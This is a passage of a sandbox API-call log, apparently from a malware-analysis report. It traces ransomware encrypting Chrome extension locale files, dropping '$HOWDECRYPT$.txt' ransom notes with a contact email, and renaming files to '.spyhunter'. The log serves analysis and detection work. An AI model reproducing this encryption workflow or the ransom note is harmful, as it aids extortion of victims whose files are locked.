nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb3c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb3c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.492] CloseHandle (hObject=0xa0) returned 1 [0159.492] GetProcessHeap () returned 0x2c0000 [0159.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f067a8 | out: hHeap=0x2c0000) returned 1 [0159.492] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ead8 | out: pbBuffer=0x57ead8) returned 1 [0159.492] GetProcessHeap () returned 0x2c0000 [0159.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0159.492] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ead0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ead0*=0x30) returned 1 [0159.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json") returned 159 [0159.494] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.494] GetProcessHeap () returned 0x2c0000 [0159.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0159.494] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea94, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ea94*=0x29c, lpOverlapped=0x0) returned 1 [0159.660] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.660] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x57ea94, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ea94*=0x29c, lpOverlapped=0x0) returned 1 [0159.660] GetProcessHeap () returned 0x2c0000 [0159.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0159.660] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.660] WriteFile (in: hFile=0xa0, lpBuffer=0x57ead4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea94, lpOverlapped=0x0 | out: lpBuffer=0x57ead4*, lpNumberOfBytesWritten=0x57ea94*=0x4, lpOverlapped=0x0) returned 1 [0159.660] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea94, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea94*=0x30, lpOverlapped=0x0) returned 1 [0159.660] CloseHandle (hObject=0xa0) returned 1 [0159.660] GetProcessHeap () returned 0x2c0000 [0159.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.660] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.spyhunter") returned 169 [0159.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json.spyhunter")) returned 1 [0159.662] GetProcessHeap () returned 0x2c0000 [0159.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.662] GetProcessHeap () returned 0x2c0000 [0159.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0159.662] GetProcessHeap () returned 0x2c0000 [0159.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81420 | out: hHeap=0x2c0000) returned 1 [0159.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.664] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.666] WriteFile (in: hFile=0xa0, lpBuffer=0x57ea0b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb34, lpOverlapped=0x0 | out: lpBuffer=0x57ea0b*, lpNumberOfBytesWritten=0x57eb34*=0x127, lpOverlapped=0x0) returned 1 [0159.667] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.667] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb34, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb34*=0x2ac, lpOverlapped=0x0) returned 1 [0159.667] CloseHandle (hObject=0xa0) returned 1 [0159.667] GetProcessHeap () returned 0x2c0000 [0159.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0f978 | out: hHeap=0x2c0000) returned 1 [0159.667] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ead0 | out: pbBuffer=0x57ead0) returned 1 [0159.667] GetProcessHeap () returned 0x2c0000 [0159.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0159.668] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eac8*=0x30) returned 1 [0159.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.669] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json") returned 162 [0159.669] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.669] GetProcessHeap () returned 0x2c0000 [0159.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0159.669] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ea8c*=0x29b, lpOverlapped=0x0) returned 1 [0159.713] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd65, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.713] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x57ea8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ea8c*=0x29b, lpOverlapped=0x0) returned 1 [0159.714] GetProcessHeap () returned 0x2c0000 [0159.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0159.714] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.714] WriteFile (in: hFile=0xa0, lpBuffer=0x57eacc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea8c, lpOverlapped=0x0 | out: lpBuffer=0x57eacc*, lpNumberOfBytesWritten=0x57ea8c*=0x4, lpOverlapped=0x0) returned 1 [0159.714] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea8c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea8c*=0x30, lpOverlapped=0x0) returned 1 [0159.714] CloseHandle (hObject=0xa0) returned 1 [0159.714] GetProcessHeap () returned 0x2c0000 [0159.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.714] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.spyhunter") returned 172 [0159.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.spyhunter")) returned 1 [0159.716] GetProcessHeap () returned 0x2c0000 [0159.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.716] GetProcessHeap () returned 0x2c0000 [0159.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0159.716] GetProcessHeap () returned 0x2c0000 [0159.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06478 | out: hHeap=0x2c0000) returned 1 [0159.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.717] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.717] WriteFile (in: hFile=0xa0, lpBuffer=0x57ea03*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb2c, lpOverlapped=0x0 | out: lpBuffer=0x57ea03*, lpNumberOfBytesWritten=0x57eb2c*=0x127, lpOverlapped=0x0) returned 1 [0159.718] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.718] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb2c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb2c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.718] CloseHandle (hObject=0xa0) returned 1 [0159.718] GetProcessHeap () returned 0x2c0000 [0159.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05e18 | out: hHeap=0x2c0000) returned 1 [0159.718] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eac8 | out: pbBuffer=0x57eac8) returned 1 [0159.718] GetProcessHeap () returned 0x2c0000 [0159.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0159.719] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eac0*=0x30) returned 1 [0159.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.722] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json") returned 159 [0159.722] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.722] GetProcessHeap () returned 0x2c0000 [0159.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0159.722] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ea84*=0x2bb, lpOverlapped=0x0) returned 1 [0159.835] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.835] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x57ea84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ea84*=0x2bb, lpOverlapped=0x0) returned 1 [0159.835] GetProcessHeap () returned 0x2c0000 [0159.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0159.835] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.835] WriteFile (in: hFile=0xa0, lpBuffer=0x57eac4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ea84, lpOverlapped=0x0 | out: lpBuffer=0x57eac4*, lpNumberOfBytesWritten=0x57ea84*=0x4, lpOverlapped=0x0) returned 1 [0159.836] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ea84, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ea84*=0x30, lpOverlapped=0x0) returned 1 [0159.836] CloseHandle (hObject=0xa0) returned 1 [0159.836] GetProcessHeap () returned 0x2c0000 [0159.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.836] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.spyhunter") returned 169 [0159.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.spyhunter")) returned 1 [0159.840] GetProcessHeap () returned 0x2c0000 [0159.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.841] GetProcessHeap () returned 0x2c0000 [0159.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0159.841] GetProcessHeap () returned 0x2c0000 [0159.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80e00 | out: hHeap=0x2c0000) returned 1 [0159.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.842] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.842] WriteFile (in: hFile=0xa0, lpBuffer=0x57e9fb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eb24, lpOverlapped=0x0 | out: lpBuffer=0x57e9fb*, lpNumberOfBytesWritten=0x57eb24*=0x127, lpOverlapped=0x0) returned 1 [0159.843] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.843] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eb24, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eb24*=0x2ac, lpOverlapped=0x0) returned 1 [0159.843] CloseHandle (hObject=0xa0) returned 1 [0159.843] GetProcessHeap () returned 0x2c0000 [0159.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1b648 | out: hHeap=0x2c0000) returned 1 [0159.843] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eac0 | out: pbBuffer=0x57eac0) returned 1 [0159.843] GetProcessHeap () returned 0x2c0000 [0159.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0159.843] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eab8*=0x30) returned 1 [0159.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0159.844] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json") returned 159 [0159.844] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.844] GetProcessHeap () returned 0x2c0000 [0159.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0159.844] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ea7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ea7c*=0x269, lpOverlapped=0x0) returned 1 [0159.891] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.891] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x57ea7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, 